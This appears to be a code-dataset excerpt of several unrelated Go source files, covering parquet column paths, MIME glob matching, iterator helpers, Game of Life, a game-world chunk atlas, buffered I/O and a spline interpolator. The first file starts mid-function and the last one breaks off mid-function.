		if strings1[i] >= strings2[i] {
			return false
		}
	}
	return len(strings1) <= len(strings2)
}
// leafColumn describes one leaf of the schema: its node, full path, the
// maximum repetition/definition levels accumulated on the way down, and
// its flat column index.
type leafColumn struct {
	node               Node
	path               columnPath
	maxRepetitionLevel int8
	maxDefinitionLevel int8
	columnIndex        int16
}
// forEachLeafColumnOf walks node's schema depth-first and invokes do for
// every leaf column, starting levels and column index at zero.
func forEachLeafColumnOf(node Node, do func(leafColumn)) {
	forEachLeafColumn(node, nil, 0, 0, 0, do)
}
// forEachLeafColumn recursively visits node, accumulating repetition and
// definition levels per the Dremel encoding rules (optional adds one
// definition level; repeated adds one of each). It returns the next free
// column index, threading it through the depth-first traversal so leaves
// are numbered left-to-right.
func forEachLeafColumn(node Node, path columnPath, columnIndex, maxRepetitionLevel, maxDefinitionLevel int, do func(leafColumn)) int {
	switch {
	case node.Optional():
		maxDefinitionLevel++
	case node.Repeated():
		maxRepetitionLevel++
		maxDefinitionLevel++
	}
	if isLeaf(node) {
		// make*Level / makeColumnIndex narrow the ints to the struct's
		// small field types (helpers defined elsewhere in the package).
		do(leafColumn{
			node:               node,
			path:               path,
			maxRepetitionLevel: makeRepetitionLevel(maxRepetitionLevel),
			maxDefinitionLevel: makeDefinitionLevel(maxDefinitionLevel),
			columnIndex:        makeColumnIndex(columnIndex),
		})
		return columnIndex + 1
	}
	for _, name := range node.ChildNames() {
		columnIndex = forEachLeafColumn(
			node.ChildByName(name),
			path.append(name),
			columnIndex,
			maxRepetitionLevel,
			maxDefinitionLevel,
			do,
		)
	}
	return columnIndex
}
func lookupColumnPath(node Node, path columnPath) Node {
for node != nil && len(path) > 0 {
node = node.ChildByName(path[0])
path = path[1:]
}
return node
}
func hasColumnPath(node Node, path columnPath) bool {
return lookupColumnPath(node, path) != nil
} | column_path.go | 0.603581 | 0.441854 | column_path.go | starcoder |
package mimemagic
import (
"sort"
"strings"
)
// byteMatcher tests a single byte against some character class.
type byteMatcher interface {
	matchByte(byte) bool
}
// matcher tests a fixed-length chunk of a string; len reports how many
// bytes it consumes.
type matcher interface {
	len() int
	match(string) bool
}
// glob is a full filename pattern: a matcher plus case sensitivity and the
// media type it resolves to.
type glob interface {
	matcher
	isCaseSensitive() bool
	mediaType() simpleGlob
}
// value matches a literal string; list matches any byte in the set;
// byteRange matches an inclusive byte interval; any matches if any of its
// byteMatchers does.
type value string
type list string
type byteRange struct{ min, max byte }
type any []byteMatcher
// pattern is a sequence of matchers with the precomputed total length.
type pattern struct {
	matchers []matcher
	length   int
}
// textPattern matches the whole filename exactly; suffixPattern anchors at
// the end; prefixPattern anchors at the start. Each carries the media-type
// index and weight used to rank matches.
type textPattern struct {
	pattern
	caseSensitive    bool
	mimeType, weight int
}
type suffixPattern struct {
	pattern
	caseSensitive    bool
	mimeType, weight int
}
type prefixPattern struct {
	pattern
	caseSensitive    bool
	mimeType, weight int
}
// len: a literal consumes its own length; the single-byte matchers consume
// exactly one byte; a pattern consumes its precomputed total.
func (v value) len() int { return len(v) }
func (list) len() int { return 1 }
func (byteRange) len() int { return 1 }
func (any) len() int { return 1 }
func (p pattern) len() int { return p.length }
func (l list) matchByte(b byte) bool { return strings.IndexByte(string(l), b) >= 0 }
func (r byteRange) matchByte(b byte) bool { return r.min <= b && b <= r.max }
// any succeeds if at least one of its component byte matchers accepts b.
func (a any) matchByte(b byte) bool {
	for _, m := range a {
		if m.matchByte(b) {
			return true
		}
	}
	return false
}
func (v value) match(s string) bool {
	return s == string(v)
}
// The single-byte matchers test the first byte of the chunk they are
// handed; callers guarantee s is non-empty (chunks are sized by len()).
func (l list) match(s string) bool {
	return l.matchByte(s[0])
}
func (r byteRange) match(s string) bool {
	return r.matchByte(s[0])
}
func (a any) match(s string) bool {
	return a.matchByte(s[0])
}
// pattern.match consumes s chunk by chunk, one matcher at a time; all
// matchers must accept their chunk.
func (p pattern) match(s string) bool {
	for _, ml := range p.matchers {
		if !ml.match(s[:ml.len()]) {
			return false
		}
		s = s[ml.len():]
	}
	return true
}
// textPattern requires an exact-length full match; suffix/prefix patterns
// anchor the underlying pattern at the end/start of the filename.
func (t textPattern) match(s string) bool { return len(s) == t.len() && t.pattern.match(s) }
func (t suffixPattern) match(s string) bool {
	return len(s) >= t.len() && t.pattern.match(s[len(s)-t.len():])
}
func (t prefixPattern) match(s string) bool { return len(s) >= t.len() && t.pattern.match(s[:t.len()]) }
func (t textPattern) isCaseSensitive() bool { return t.caseSensitive }
func (t suffixPattern) isCaseSensitive() bool { return t.caseSensitive }
func (t prefixPattern) isCaseSensitive() bool { return t.caseSensitive }
func (t textPattern) mediaType() simpleGlob { return simpleGlob{t.weight, t.mimeType} }
func (t suffixPattern) mediaType() simpleGlob { return simpleGlob{t.weight, t.mimeType} }
func (t prefixPattern) mediaType() simpleGlob { return simpleGlob{t.weight, t.mimeType} }
// simpleGlob is a (weight, media type index) pair used to rank matches.
type simpleGlob struct {
	weight, mimeType int
}
// MatchGlob determines the MIME type of the file using
// exclusively its filename, returning the highest-weight match from the
// package's media type table.
func MatchGlob(filename string) MediaType {
	return mediaTypes[matchGlob(filename)]
}
// matchGlob returns the media-type index of the best (first-ranked) match.
func matchGlob(filename string) int {
	return matchGlobAll(filename)[0]
}
// matchGlobAll collects every glob match for filename — exact names,
// suffixes, prefixes (case-sensitive and lowercased variants from the
// package's lookup tables) and the fallback pattern list — and returns the
// media-type indices sorted by descending weight. If nothing matches, a
// single unknownType entry is returned.
func matchGlobAll(filename string) []int {
	var globResults []simpleGlob
	lowerCase := strings.ToLower(filename)
	// Whole-filename lookups (case-sensitive table first).
	if t, ok := textCS[filename]; ok {
		globResults = append(globResults, t...)
	}
	if t, ok := text[lowerCase]; ok {
		globResults = append(globResults, t...)
	}
	fnLen := len(filename)
	// Try every suffix/prefix length up to globMaxLen (min is a package
	// helper; pre-1.21 Go has no builtin min for ints).
	for l := min(len(filename), globMaxLen); l > 0; l-- {
		if t, ok := suffixesCS[filename[fnLen-l:]]; ok {
			globResults = append(globResults, t...)
		}
		if t, ok := prefixesCS[filename[:l]]; ok {
			globResults = append(globResults, t...)
		}
		if t, ok := suffixes[lowerCase[fnLen-l:]]; ok {
			globResults = append(globResults, t...)
		}
		if t, ok := prefixes[lowerCase[:l]]; ok {
			globResults = append(globResults, t...)
		}
	}
	// Fallback patterns: case-insensitive globs test the lowercased name,
	// case-sensitive globs test the original.
	for _, g := range globs {
		if (g.isCaseSensitive() || g.match(lowerCase)) && (!g.isCaseSensitive() || g.match(filename)) {
			globResults = append(globResults, g.mediaType())
		}
	}
	if globResults == nil {
		return []int{unknownType}
	}
	// NOTE(review): sort.Slice is not stable, so the order of equal-weight
	// matches is unspecified — confirm callers don't depend on tie order.
	sort.Slice(globResults, func(i, j int) bool { return globResults[i].weight > globResults[j].weight })
	results := make([]int, len(globResults))
	for i := range globResults {
		results[i] = globResults[i].mimeType
	}
	return results
}
package iter
// Any represents any type.
type Any interface{}
type (
	// UnaryPredicate checks if a value satisfy condition.
	UnaryPredicate func(Any) bool
	// EqComparer checks if first value equals to the second value.
	EqComparer func(Any, Any) bool
	// LessComparer checks if first value is less than the second value.
	LessComparer func(Any, Any) bool
	// ThreeWayComparer compares 2 values, returns 1 if first>second, 0 if
	// first=second, -1 if first<second.
	ThreeWayComparer func(Any, Any) int
	// IteratorFunction apply some actions to a value.
	IteratorFunction func(Any)
	// UnaryOperation transforms a value to another.
	UnaryOperation func(Any) Any
	// BinaryOperation transforms 2 values to 1 value.
	BinaryOperation func(Any, Any) Any
	// Generator creates a value on each call.
	Generator func() Any
)
// _eq reports equality of x and y, preferring a user-supplied Eq method on
// x when present and falling back to the builtin == comparison.
func _eq(x, y Any) bool {
	type ieq interface{ Eq(Any) bool }
	switch v := x.(type) {
	case ieq:
		return v.Eq(y)
	default:
		return x == y
	}
}

// _ne is the negation of _eq.
func _ne(x, y Any) bool {
	return !_eq(x, y)
}
// _less reports x < y, preferring a user-supplied Less method on x and
// falling back to the three-way comparison.
func _less(x, y Any) bool {
	type iless interface{ Less(Any) bool }
	if c, ok := x.(iless); ok {
		return c.Less(y)
	}
	return _cmp(x, y) < 0
}
// _cmp three-way-compares x and y, preferring a user-supplied Cmp method;
// reflectCmp (defined elsewhere, presumably a reflection-based fallback)
// handles the remaining types.
func _cmp(x, y Any) int {
	type icmp interface{ Cmp(Any) int }
	if t, ok := x.(icmp); ok {
		return t.Cmp(y)
	}
	return reflectCmp(x, y)
}
// _inc increments x, preferring a user-supplied Inc method; reflectInc
// (defined elsewhere) handles the remaining types.
func _inc(x Any) Any {
	type iinc interface{ Inc() Any }
	if i, ok := x.(iinc); ok {
		return i.Inc()
	}
	return reflectInc(x)
}
// _add adds y to x, preferring a user-supplied Add method.
func _add(x, y Any) Any {
	type iadd interface{ Add(Any) Any }
	if a, ok := x.(iadd); ok {
		return a.Add(y)
	}
	return reflectAdd(x, y)
}
// _sub subtracts y from x, preferring a user-supplied Sub method.
func _sub(x, y Any) Any {
	type isub interface{ Sub(Any) Any }
	if s, ok := x.(isub); ok {
		return s.Sub(y)
	}
	return reflectSub(x, y)
}
// _mul multiplies x by y, preferring a user-supplied Mul method.
func _mul(x, y Any) Any {
	type imul interface{ Mul(Any) Any }
	if m, ok := x.(imul); ok {
		return m.Mul(y)
	}
	return reflectMul(x, y)
}
// Returns a Predicate that returns true if the value equals v.
func _eq1(v Any) UnaryPredicate {
	return func(x Any) bool {
		return _eq(v, x)
	}
}
// _not1 returns the negation of predicate p.
func _not1(p UnaryPredicate) UnaryPredicate {
	return func(x Any) bool { return !p(x) }
}
// _true1 accepts every value; _noop returns its argument unchanged.
func _true1(Any) bool { return true }
func _noop(x Any) Any { return x }
package life
// Game of life. Constructor functions should be used to create instances.
type Game struct {
	cells Cells
	// neighbors returns the candidate neighbor positions of a point; the
	// bounded constructor supplies a clipped variant.
	neighbors func(Point) []Point
}
// State of a cell
type State int
const (
	// Dead indicates that a cell is dead
	Dead State = iota
	// Alive indicates that a cell is alive
	Alive
)
// Cells represented by a map keyed by position; absent keys read as Dead
// (the zero State).
type Cells map[Point]State
// NewUnboundedGame creates an unbounded Game populated with the supplied live cells
func NewUnboundedGame(liveCellLocations []Point) *Game {
	return &Game{
		cells:     newCells(liveCellLocations),
		neighbors: unboundedNeighbors,
	}
}
// NewBoundedGame creates a bounded Game populated with the supplied live cells. The game is a rectangular area with
// corners at the minimum and maximum points. No cells can live outside of the game area.
func NewBoundedGame(liveCellLocations []Point, min Point, max Point) *Game {
	return &Game{
		cells:     newCells(liveCellLocations),
		neighbors: boundedNeighbors(min, max),
	}
}
func newCells(locations []Point) Cells {
cells := make(Cells, len(locations))
for _, location := range locations {
cells[location] = Alive
}
return cells
}
// Cells in the game
func (g *Game) Cells() Cells {
	return g.cells
}
// Next iteration of the game. The receiver is not modified; a new Game
// holding the next generation is returned.
func (g *Game) Next() *Game {
	nextCells := make(Cells)
	g.forEachLiveCell(func(location Point) {
		if g.isSurvivor(location) {
			nextCells[location] = Alive
		}
		// Births can only happen next to a live cell, so scanning the
		// neighbors of live cells covers every birth candidate.
		g.addNeighborBirths(nextCells, location)
	})
	return &Game{
		cells:     nextCells,
		neighbors: g.neighbors,
	}
}
// forEachLiveCell invokes fn for every live cell position.
func (g *Game) forEachLiveCell(fn func(Point)) {
	for cell := range g.cells {
		fn(cell)
	}
}
// isSurvivor reports whether the cell at location survives to the next
// generation (2 or 3 live neighbors). Only called for live cells.
func (g *Game) isSurvivor(location Point) bool {
	liveNeighborCount := g.liveNeighborCount(location)
	return liveNeighborCount == 2 || liveNeighborCount == 3
}
// liveNeighborCount counts the live neighbors of location.
func (g *Game) liveNeighborCount(location Point) (count int) {
	g.forEachNeighbor(location, func(neighbor Point) {
		if g.cells[neighbor] == Alive {
			count++
		}
	})
	return count
}
// forEachNeighbor invokes fn for each neighbor of location, as produced by
// the game's (bounded or unbounded) neighbor strategy.
func (g *Game) forEachNeighbor(location Point, fn func(Point)) {
	for _, neighbor := range g.neighbors(location) {
		fn(neighbor)
	}
}
// addNeighborBirths records into cells any dead neighbor of location that is
// born this generation (skipping positions already marked Alive).
func (g *Game) addNeighborBirths(cells Cells, location Point) {
	g.forEachNeighbor(location, func(neighbor Point) {
		if cells[neighbor] != Alive && g.isBorn(neighbor) {
			cells[neighbor] = Alive
		}
	})
}
// isBorn reports whether the dead cell at location comes alive
// (exactly 3 live neighbors).
func (g *Game) isBorn(location Point) bool {
	return g.cells[location] == Dead && g.liveNeighborCount(location) == 3
}
// boundedNeighbors returns a neighbor strategy that clips neighbors to the
// rectangle with corners min and max (inclusive).
func boundedNeighbors(min Point, max Point) func(Point) []Point {
	return func(p Point) []Point {
		possibleNeighbors := unboundedNeighbors(p)
		neighbors := make([]Point, 0, len(possibleNeighbors))
		for _, neighbor := range possibleNeighbors {
			if !neighbor.LessThan(min) && !neighbor.GreaterThan(max) {
				neighbors = append(neighbors, neighbor)
			}
		}
		return neighbors
	}
}
func unboundedNeighbors(p Point) []Point {
return []Point{
{p.X - 1, p.Y - 1},
{p.X - 1, p.Y},
{p.X - 1, p.Y + 1},
{p.X, p.Y - 1},
{p.X, p.Y + 1},
{p.X + 1, p.Y - 1},
{p.X + 1, p.Y},
{p.X + 1, p.Y + 1},
}
} | life/game.go | 0.826537 | 0.755389 | game.go | starcoder |
package rove
import (
"log"
"github.com/mdiluz/rove/pkg/maths"
"github.com/mdiluz/rove/proto/roveapi"
)
// chunk represents a fixed square grid of tiles
type chunk struct {
	// Tiles represents the tiles within the chunk. A nil slice marks a
	// chunk that has not yet been filled in by the world generator.
	Tiles []byte
	// Objects represents the objects within the chunk
	// only one possible object per tile for now
	Objects map[int]Object
}
// chunkBasedAtlas represents a grid of Chunks
type chunkBasedAtlas struct {
	// Chunks represents all chunks in the world
	// This is intentionally not a 2D array so it can be expanded in all directions
	Chunks []chunk
	// LowerBound is the origin of the bottom left corner of the current chunks in world space (current chunks cover >= this value)
	LowerBound maths.Vector
	// UpperBound is the top left corner of the current chunks (current chunks cover < this value)
	UpperBound maths.Vector
	// ChunkSize is the x/y dimensions of each square chunk
	ChunkSize int
	// worldGen is the internal world generator
	worldGen WorldGen
}
const (
	// noiseSeed seeds the procedural world generator.
	noiseSeed = 1024
)
// NewChunkAtlas creates a new empty atlas
func NewChunkAtlas(chunkSize int) Atlas {
	// Start up with one chunk
	a := chunkBasedAtlas{
		ChunkSize:  chunkSize,
		Chunks:     make([]chunk, 1),
		LowerBound: maths.Vector{X: 0, Y: 0},
		UpperBound: maths.Vector{X: chunkSize, Y: chunkSize},
		worldGen:   NewNoiseWorldGen(noiseSeed),
	}
	// Initialise the first chunk
	a.populate(0)
	return &a
}
// SetTile sets an individual tile's kind, growing the atlas if the position
// falls outside the current bounds.
func (a *chunkBasedAtlas) SetTile(v maths.Vector, tile roveapi.Tile) {
	c := a.worldSpaceToChunkWithGrow(v)
	local := a.worldSpaceToChunkLocal(v)
	a.setTile(c, local, byte(tile))
}
// SetObject sets the object on a tile, growing the atlas if needed.
func (a *chunkBasedAtlas) SetObject(v maths.Vector, obj Object) {
	c := a.worldSpaceToChunkWithGrow(v)
	local := a.worldSpaceToChunkLocal(v)
	a.setObject(c, local, obj)
}
// QueryPosition will return the tile and object for a specific position.
func (a *chunkBasedAtlas) QueryPosition(v maths.Vector) (roveapi.Tile, Object) {
	c := a.worldSpaceToChunkWithGrow(v)
	local := a.worldSpaceToChunkLocal(v)
	// Lazily generate the chunk contents before reading from it
	a.populate(c)
	chunk := a.Chunks[c]
	i := a.chunkTileIndex(local)
	return roveapi.Tile(chunk.Tiles[i]), chunk.Objects[i]
}
// chunkTileIndex returns the tile index within a chunk for a chunk-local
// coordinate (row-major layout).
func (a *chunkBasedAtlas) chunkTileIndex(local maths.Vector) int {
	return local.X + local.Y*a.ChunkSize
}
// populate will fill a chunk with data from the world generator. It is a
// no-op when the chunk has already been populated (non-nil Tiles).
func (a *chunkBasedAtlas) populate(chunk int) {
	c := a.Chunks[chunk]
	if c.Tiles != nil {
		return
	}
	c.Tiles = make([]byte, a.ChunkSize*a.ChunkSize)
	c.Objects = make(map[int]Object)
	origin := a.chunkOriginInWorldSpace(chunk)
	for i := 0; i < a.ChunkSize; i++ {
		for j := 0; j < a.ChunkSize; j++ {
			loc := maths.Vector{X: origin.X + i, Y: origin.Y + j}
			// Set the tile
			c.Tiles[j*a.ChunkSize+i] = byte(a.worldGen.GetTile(loc))
			// Set the object; unknown means "no object here"
			obj := a.worldGen.GetObject(loc)
			if obj.Type != roveapi.Object_ObjectUnknown {
				c.Objects[j*a.ChunkSize+i] = obj
			}
		}
	}
	a.Chunks[chunk] = c
}
// setTile sets a tile in a specific chunk
func (a *chunkBasedAtlas) setTile(chunk int, local maths.Vector, tile byte) {
	a.populate(chunk)
	c := a.Chunks[chunk]
	c.Tiles[a.chunkTileIndex(local)] = tile
	a.Chunks[chunk] = c
}
// setObject sets an object in a specific chunk. An ObjectUnknown type
// clears any object stored on the tile.
func (a *chunkBasedAtlas) setObject(chunk int, local maths.Vector, object Object) {
	a.populate(chunk)
	c := a.Chunks[chunk]
	i := a.chunkTileIndex(local)
	if object.Type != roveapi.Object_ObjectUnknown {
		c.Objects[i] = object
	} else {
		delete(c.Objects, i)
	}
	a.Chunks[chunk] = c
}
// worldSpaceToChunkLocal gets a chunk local coordinate for a tile
func (a *chunkBasedAtlas) worldSpaceToChunkLocal(v maths.Vector) maths.Vector {
	// Pmod keeps the result positive for negative world coordinates
	return maths.Vector{X: maths.Pmod(v.X, a.ChunkSize), Y: maths.Pmod(v.Y, a.ChunkSize)}
}
// worldSpaceToChunkIndex gets the current chunk index for a position in the
// world. The position must lie within the current bounds.
func (a *chunkBasedAtlas) worldSpaceToChunkIndex(v maths.Vector) int {
	// Shift the vector by our current min
	v = v.Added(a.LowerBound.Negated())
	// Divide by the current size and floor, to get chunk-scaled vector from the lower bound
	v = v.DividedFloor(a.ChunkSize)
	// Calculate the width
	width := a.UpperBound.X - a.LowerBound.X
	widthInChunks := width / a.ChunkSize
	// Along the corridor and up the stairs
	return (v.Y * widthInChunks) + v.X
}
// chunkOriginInWorldSpace returns the origin of the chunk in world space
// (the inverse of worldSpaceToChunkIndex for a chunk's corner).
func (a *chunkBasedAtlas) chunkOriginInWorldSpace(chunk int) maths.Vector {
	// Calculate the width
	width := a.UpperBound.X - a.LowerBound.X
	widthInChunks := width / a.ChunkSize
	// Reverse the along the corridor and up the stairs
	v := maths.Vector{
		X: chunk % widthInChunks,
		Y: chunk / widthInChunks,
	}
	// Multiply up to world scale
	v = v.Multiplied(a.ChunkSize)
	// Shift by the lower bound
	return v.Added(a.LowerBound)
}
// getNewBounds gets new lower and upper bounds for the world space given a
// vector, expanded to include it and aligned to whole-chunk boundaries.
func (a *chunkBasedAtlas) getNewBounds(v maths.Vector) (lower maths.Vector, upper maths.Vector) {
	lower = maths.Min2(v, a.LowerBound)
	upper = maths.Max2(v.Added(maths.Vector{X: 1, Y: 1}), a.UpperBound)
	lower = maths.Vector{
		X: maths.RoundDown(lower.X, a.ChunkSize),
		Y: maths.RoundDown(lower.Y, a.ChunkSize),
	}
	upper = maths.Vector{
		X: maths.RoundUp(upper.X, a.ChunkSize),
		Y: maths.RoundUp(upper.Y, a.ChunkSize),
	}
	return
}
// worldSpaceToChunkWithGrow will expand the current atlas for a given world
// space position if needed, and returns the chunk index for that position.
func (a *chunkBasedAtlas) worldSpaceToChunkWithGrow(v maths.Vector) int {
	// If we're within bounds, just return the current chunk
	if v.X >= a.LowerBound.X && v.Y >= a.LowerBound.Y && v.X < a.UpperBound.X && v.Y < a.UpperBound.Y {
		return a.worldSpaceToChunkIndex(v)
	}
	// Calculate the new bounds
	lower, upper := a.getNewBounds(v)
	size := upper.Added(lower.Negated())
	size = size.Divided(a.ChunkSize)
	// Create the new empty atlas
	newAtlas := chunkBasedAtlas{
		ChunkSize:  a.ChunkSize,
		LowerBound: lower,
		UpperBound: upper,
		Chunks:     make([]chunk, size.X*size.Y),
		worldGen:   a.worldGen,
	}
	// Log that we're resizing
	log.Printf("Re-allocating world, old: %+v,%+v new: %+v,%+v\n", a.LowerBound, a.UpperBound, newAtlas.LowerBound, newAtlas.UpperBound)
	// Copy all old chunks into the new atlas; unpopulated chunks stay lazy
	for chunk, chunkData := range a.Chunks {
		// Calculate the chunk ID in the new atlas
		origin := a.chunkOriginInWorldSpace(chunk)
		newChunk := newAtlas.worldSpaceToChunkIndex(origin)
		// Copy over the old chunk to the new atlas
		newAtlas.Chunks[newChunk] = chunkData
	}
	// Overwrite the old atlas with this one
	*a = newAtlas
	return a.worldSpaceToChunkIndex(v)
} | pkg/rove/chunkAtlas.go | 0.794704 | 0.695884 | chunkAtlas.go | starcoder |
package bufio
import (
"bufio"
"bytes"
"io"
)
const defaultBufferSize = 1024
// Reader implements buffering for an io.Reader object.
type Reader struct {
	// err records the first error seen; once set, all operations fail with it.
	err error
	// buf is the internal buffer; unread data lives in buf[rpos:wpos].
	buf []byte
	// rd is the underlying reader.
	rd io.Reader
	// rpos is the read offset into buf.
	rpos int
	// wpos is the write offset into buf.
	wpos int
	// slice allocates the byte slices handed out by ReadBytes/ReadFull.
	slice SliceAlloc
}
// NewReader returns a new Reader whose buffer has the default size.
func NewReader(rd io.Reader) *Reader {
	return NewReaderSize(rd, defaultBufferSize)
}
// NewReaderSize returns a new Reader whose buffer has the specified size.
// A non-positive size falls back to the default buffer size.
func NewReaderSize(rd io.Reader, size int) *Reader {
	if size <= 0 {
		size = defaultBufferSize
	}
	return &Reader{rd: rd, buf: make([]byte, size)}
}
// fill reads more data from the underlying reader into the buffer. It first
// compacts unread data to the front, then issues a single Read. The first
// error (including io.ErrNoProgress on a zero-length read) is latched into
// b.err and returned.
func (b *Reader) fill() error {
	if b.err != nil {
		return b.err
	}
	if b.rpos > 0 {
		n := copy(b.buf, b.buf[b.rpos:b.wpos])
		b.rpos = 0
		b.wpos = n
	}
	n, err := b.rd.Read(b.buf[b.wpos:])
	if err != nil {
		b.err = err
	} else if n == 0 {
		b.err = io.ErrNoProgress
	} else {
		b.wpos += n
	}
	return b.err
}
// buffered returns the number of unread bytes currently in the buffer.
func (b *Reader) buffered() int {
	return b.wpos - b.rpos
}
// Read reads data into p.
// It returns the number of bytes read into p.
// The bytes are taken from at most one Read on the underlying Reader,
// hence n may be less than len(p).
// At EOF, the count will be zero and err will be io.EOF.
func (b *Reader) Read(p []byte) (int, error) {
	if b.err != nil || len(p) == 0 {
		return 0, b.err
	}
	if b.buffered() == 0 {
		// Large reads bypass the buffer and go straight to the underlying
		// reader to avoid an extra copy.
		if len(p) >= len(b.buf) {
			n, err := b.rd.Read(p)
			if err != nil {
				b.err = err
			}
			return n, b.err
		}
		if b.fill() != nil {
			return 0, b.err
		}
	}
	n := copy(p, b.buf[b.rpos:b.wpos])
	b.rpos += n
	return n, nil
}
// ReadByte reads and returns a single byte.
// If no byte is available, returns an error.
func (b *Reader) ReadByte() (byte, error) {
	if b.err != nil {
		return 0, b.err
	}
	if b.buffered() == 0 {
		if b.fill() != nil {
			return 0, b.err
		}
	}
	c := b.buf[b.rpos]
	b.rpos++
	return c, nil
}
// ReadSlice reads until the first occurrence of delim in the input,
// returning a slice pointing at the bytes in the buffer.
// The bytes stop being valid at the next read.
// If the buffer fills without a delim, ReadSlice returns the whole buffer
// together with bufio.ErrBufferFull. If the underlying reader fails before
// a delimiter is found, ReadSlice returns nil and that error.
// Because the data returned from ReadSlice will be overwritten
// by the next I/O operation, most clients should use ReadBytes instead.
// ReadSlice returns err != nil if and only if line does not end in delim.
func (b *Reader) ReadSlice(delim byte) ([]byte, error) {
	if b.err != nil {
		return nil, b.err
	}
	for {
		var index = bytes.IndexByte(b.buf[b.rpos:b.wpos], delim)
		if index >= 0 {
			limit := b.rpos + index + 1
			slice := b.buf[b.rpos:limit]
			b.rpos = limit
			return slice, nil
		}
		if b.buffered() == len(b.buf) {
			b.rpos = b.wpos
			return b.buf, bufio.ErrBufferFull
		}
		if b.fill() != nil {
			return nil, b.err
		}
	}
}
// ReadBytes reads until the first occurrence of delim in the input,
// returning a freshly allocated slice containing the data up to and
// including the delimiter.
// If the underlying reader fails before a delimiter is found (often io.EOF),
// ReadBytes returns nil and the error; data read so far is discarded.
// For simple uses, a Scanner may be more convenient.
func (b *Reader) ReadBytes(delim byte) ([]byte, error) {
	var full [][]byte
	var last []byte
	var size int
	for last == nil {
		f, err := b.ReadSlice(delim)
		if err != nil {
			if err != bufio.ErrBufferFull {
				return nil, b.err
			}
			// The buffer filled without a delimiter: copy the fragment out
			// before the next ReadSlice overwrites it.
			dup := b.slice.Make(len(f))
			copy(dup, f)
			full = append(full, dup)
		} else {
			last = f
		}
		size += len(f)
	}
	// Stitch the saved fragments plus the final piece into one slice.
	var n int
	var buf = b.slice.Make(size)
	for _, frag := range full {
		n += copy(buf[n:], frag)
	}
	copy(buf[n:], last)
	return buf, nil
}
// ReadFull reads exactly n bytes and returns them as a new slice.
// If fewer than n bytes are available, it returns nil and the error from the
// underlying reader (io.ErrUnexpectedEOF when EOF interrupts a partial read).
// When n == 0 or a previous error is pending, it returns nil and that error.
func (b *Reader) ReadFull(n int) ([]byte, error) {
	if b.err != nil || n == 0 {
		return nil, b.err
	}
	var buf = b.slice.Make(n)
	if _, err := io.ReadFull(b, buf); err != nil {
		return nil, err
	}
	return buf, nil
}
// Writer implements buffering for an io.Writer object.
// If an error occurs writing to a Writer, no more data will be
// accepted and all subsequent writes, and Flush, will return the error.
// After all data has been written, the client should call the
// Flush method to guarantee all data has been forwarded to
// the underlying io.Writer.
type Writer struct {
	// err records the first write error; once set, all operations fail with it.
	err error
	// buf is the internal buffer; pending data lives in buf[:wpos].
	buf []byte
	// wr is the underlying writer.
	wr io.Writer
	// wpos is the number of buffered bytes awaiting a flush.
	wpos int
}
// NewWriter returns a new Writer whose buffer has the default size.
func NewWriter(wr io.Writer) *Writer {
	return NewWriterSize(wr, defaultBufferSize)
}
// NewWriterSize returns a new Writer whose buffer has the specified size.
// A non-positive size falls back to the default buffer size.
func NewWriterSize(wr io.Writer, size int) *Writer {
	if size <= 0 {
		size = defaultBufferSize
	}
	return &Writer{wr: wr, buf: make([]byte, size)}
}
// Flush writes any buffered data to the underlying io.Writer.
func (b *Writer) Flush() error {
	return b.flush()
}
// flush writes the buffered bytes in a single call to the underlying
// writer, recording a short write as io.ErrShortWrite.
func (b *Writer) flush() error {
	if b.err != nil {
		return b.err
	}
	if b.wpos == 0 {
		return nil
	}
	n, err := b.wr.Write(b.buf[:b.wpos])
	if err != nil {
		b.err = err
	} else if n < b.wpos {
		b.err = io.ErrShortWrite
	} else {
		b.wpos = 0
	}
	return b.err
}
// available returns the free space left in the buffer.
func (b *Writer) available() int {
	return len(b.buf) - b.wpos
}
// Write writes the contents of p into the buffer.
// It returns the number of bytes written.
// If nn < len(p), it also returns an error explaining
// why the write is short.
func (b *Writer) Write(p []byte) (nn int, err error) {
	for b.err == nil && len(p) > b.available() {
		var n int
		if b.wpos == 0 {
			// Buffer is empty and p is larger than it: write directly,
			// skipping a useless copy through the buffer.
			n, b.err = b.wr.Write(p)
		} else {
			n = copy(b.buf[b.wpos:], p)
			b.wpos += n
			b.flush()
		}
		nn, p = nn+n, p[n:]
	}
	if b.err != nil || len(p) == 0 {
		return nn, b.err
	}
	n := copy(b.buf[b.wpos:], p)
	b.wpos += n
	return nn + n, nil
}
// WriteByte writes a single byte.
func (b *Writer) WriteByte(c byte) error {
	if b.err != nil {
		return b.err
	}
	if b.available() == 0 && b.flush() != nil {
		return b.err
	}
	b.buf[b.wpos] = c
	b.wpos++
	return nil
}
// WriteString writes a string.
// It returns the number of bytes written.
// If the count is less than len(s), it also returns an error explaining
// why the write is short.
func (b *Writer) WriteString(s string) (nn int, err error) {
	for b.err == nil && len(s) > b.available() {
		n := copy(b.buf[b.wpos:], s)
		b.wpos += n
		b.flush()
		nn, s = nn+n, s[n:]
	}
	if b.err != nil || len(s) == 0 {
		return nn, b.err
	}
	n := copy(b.buf[b.wpos:], s)
	b.wpos += n
	return nn + n, nil
}
} | lib/bufio/bufio.go | 0.670932 | 0.422088 | bufio.go | starcoder |
package colorgrad
import (
"math"
"github.com/lucasb-eyer/go-colorful"
"github.com/mazznoer/csscolorparser"
)
// interpolator evaluates a one-dimensional curve at parameter t.
type interpolator interface {
	at(float64) float64
}
// Adapted from https://qroph.github.io/2018/07/30/smooth-paths-using-catmull-rom-splines.html
// catmullRomInterpolator holds per-segment cubic coefficients for a
// Catmull-Rom spline through the input values.
type catmullRomInterpolator struct {
	segments [][4]float64
	pos      []float64
}
// newCatmullRomInterpolator fits a Catmull-Rom spline through values at the
// given positions. Requires at least two values; the endpoints are mirrored
// to supply the outer control points.
func newCatmullRomInterpolator(values, pos []float64) catmullRomInterpolator {
	alpha := 0.5   // knot parameterization exponent
	tension := 0.0 // 0 = no tightening of the curve
	n := len(values)
	// Pad with mirrored phantom points so every real segment has four controls.
	vals := make([]float64, n+2)
	vals[0] = 2*values[0] - values[1]
	for i, v := range values {
		vals[i+1] = v
	}
	vals[n+1] = 2*values[n-1] - values[n-2]
	segments := [][4]float64{}
	for i := 1; i < len(vals)-2; i++ {
		v0 := vals[i-1]
		v1 := vals[i]
		v2 := vals[i+1]
		v3 := vals[i+2]
		t0 := 0.0
		t1 := t0 + math.Pow(math.Abs(v0-v1), alpha)
		t2 := t1 + math.Pow(math.Abs(v1-v2), alpha)
		t3 := t2 + math.Pow(math.Abs(v2-v3), alpha)
		m1 := (1. - tension) * (t2 - t1) * ((v0-v1)/(t0-t1) - (v0-v2)/(t0-t2) + (v1-v2)/(t1-t2))
